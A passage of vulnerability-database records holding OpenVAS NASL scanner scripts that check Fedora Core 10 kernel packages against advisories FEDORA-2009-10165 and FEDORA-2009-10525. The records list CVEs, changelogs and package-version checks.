2.6.27.35:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.31\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.32\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.33\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.34\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.35\n\nChangeLog:\n\n* Sat Sep 26 2009 Chuck Ebbert 2.6.27.35-170.2.94\n- Backport appletalk: Fix skb leak when ipddp interface is not loaded\n(fixes CVE-2009-2903)\n* Sat Sep 26 2009 Chuck Ebbert 2.6.27.35-170.2.93\n- Backport KVM: x86: Disallow hypercalls for guest callers in rings > 0\n(fixes CVE-2009-3290)\n* Thu Sep 24 2009 Chuck Ebbert 2.6.27.35-170.2.92\n- Linux 2.6.27.35\n- Drop merged patches:\nlinux-2.6-nfsd-report-short-writes-fix.patch\nlinux-2.6-nfsd-report-short-writes.patch\n* Tue Sep 15 2009 Chuck Ebbert 2.6.27.34-170.2.91\n- Linux 2.6.27.34\n- Drop merged patch: linux-2.6-slub-fix-destroy-by-rcu.patch\n* Wed Sep 9 2009 Chuck Ebbert 2.6.27.32-170.2.90\n- 2.6.27.32 final\n- Drop linux-2.6-ocfs2-handle-len-0.patch, added after .32-rc1\n* Mon Sep 7 2009 Chuck Ebbert 2.6.27.32-170.2.89.rc1\n- Backport fix for b43 on ppc64 to 2.6.27 (#514787)\n* Sun Sep 6 2009 Chuck Ebbert 2.6.27.32-170.2.88.rc1\n- Add patches requested for the next stable release:\nlinux-2.6-slub-fix-destroy-by-rcu.patch (fixes bug in 2.6.27.29)\nlinux-2.6-ocfs2-handle-len-0.patch (fixes bug in 2.6.27.32-rc1)\n* Fri Sep 4 2009 Chuck Ebbert 2.6.27.32-170.2.87.rc1\n- Copy fix for NFS short write reporting from F-10 2.6.29 kernel (#493500)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-10165\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-10165.\";\n\n\n\nif(description)\n{\n script_id(64999);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-06 02:49:40 +0200 (Tue, 06 Oct 2009)\");\n script_cve_id(\"CVE-2009-2903\", \"CVE-2009-3290\", \"CVE-2009-2847\", \"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\", \"CVE-2009-3001\", \"CVE-2009-3002\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-10165 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515392\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=524124\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=522331\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=519305\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:33", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-10165.", "cvss3": {}, "published": "2009-10-06T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-10165 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-3001", "CVE-2008-5079", "CVE-2009-3290", "CVE-2009-0065", "CVE-2009-2407", "CVE-2009-3002", "CVE-2009-2406", "CVE-2009-2903", "CVE-2009-1897", "CVE-2009-2847"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064999", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064999", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_10165.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-10165 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to kernel 2.6.27.35:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.31\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.32\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.33\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.34\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.35\n\nChangeLog:\n\n* Sat Sep 26 2009 Chuck Ebbert 2.6.27.35-170.2.94\n- Backport appletalk: Fix skb leak when ipddp interface is not loaded\n(fixes CVE-2009-2903)\n* Sat Sep 26 2009 Chuck Ebbert 2.6.27.35-170.2.93\n- Backport KVM: x86: Disallow hypercalls for guest callers in rings > 0\n(fixes CVE-2009-3290)\n* Thu Sep 24 2009 Chuck Ebbert 2.6.27.35-170.2.92\n- Linux 2.6.27.35\n- Drop merged patches:\nlinux-2.6-nfsd-report-short-writes-fix.patch\nlinux-2.6-nfsd-report-short-writes.patch\n* Tue Sep 15 2009 Chuck Ebbert 2.6.27.34-170.2.91\n- Linux 2.6.27.34\n- Drop merged patch: linux-2.6-slub-fix-destroy-by-rcu.patch\n* Wed Sep 9 2009 Chuck Ebbert 2.6.27.32-170.2.90\n- 2.6.27.32 final\n- Drop linux-2.6-ocfs2-handle-len-0.patch, added after .32-rc1\n* Mon Sep 7 2009 Chuck Ebbert 2.6.27.32-170.2.89.rc1\n- Backport fix for b43 on ppc64 to 2.6.27 (#514787)\n* Sun Sep 6 2009 Chuck Ebbert 2.6.27.32-170.2.88.rc1\n- Add patches requested for the next stable release:\nlinux-2.6-slub-fix-destroy-by-rcu.patch (fixes bug in 2.6.27.29)\nlinux-2.6-ocfs2-handle-len-0.patch (fixes bug in 2.6.27.32-rc1)\n* Fri Sep 4 2009 Chuck Ebbert 2.6.27.32-170.2.87.rc1\n- Copy fix for NFS short write reporting from F-10 2.6.29 kernel (#493500)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-10165\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-10165.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64999\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-06 02:49:40 +0200 (Tue, 06 Oct 2009)\");\n script_cve_id(\"CVE-2009-2903\", \"CVE-2009-3290\", \"CVE-2009-2847\", \"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\", \"CVE-2009-3001\", \"CVE-2009-3002\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-10165 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515392\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=524124\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=522331\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=519305\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.35~170.2.94.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:13", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-10525.", "cvss3": {}, "published": "2009-10-19T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-10525 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-2910", "CVE-2008-5079", "CVE-2009-3290", "CVE-2009-0065", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-2908", "CVE-2009-2903", "CVE-2009-2909", "CVE-2009-1897", "CVE-2009-2847"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231066048", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066048", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_10525.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-10525 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to kernel 2.6.27.37:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.36\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.37\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-10525\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-10525.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66048\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-19 21:50:22 +0200 (Mon, 19 Oct 2009)\");\n script_cve_id(\"CVE-2009-2908\", \"CVE-2009-2903\", \"CVE-2009-3290\", \"CVE-2009-2847\", \"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\", \"CVE-2009-2909\", \"CVE-2009-2910\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-10525 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=527534\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=528887\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=526788\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:44", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-10525.", "cvss3": {}, "published": "2009-10-19T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-10525 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-2910", "CVE-2008-5079", "CVE-2009-3290", "CVE-2009-0065", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-2908", "CVE-2009-2903", "CVE-2009-2909", "CVE-2009-1897", "CVE-2009-2847"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:66048", "href": "http://plugins.openvas.org/nasl.php?oid=66048", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_10525.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-10525 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to kernel 2.6.27.37:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.36\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.37\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-10525\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-10525.\";\n\n\n\nif(description)\n{\n script_id(66048);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-19 21:50:22 +0200 (Mon, 19 Oct 2009)\");\n script_cve_id(\"CVE-2009-2908\", \"CVE-2009-2903\", \"CVE-2009-3290\", \"CVE-2009-2847\", \"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\", \"CVE-2009-2909\", \"CVE-2009-2910\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", 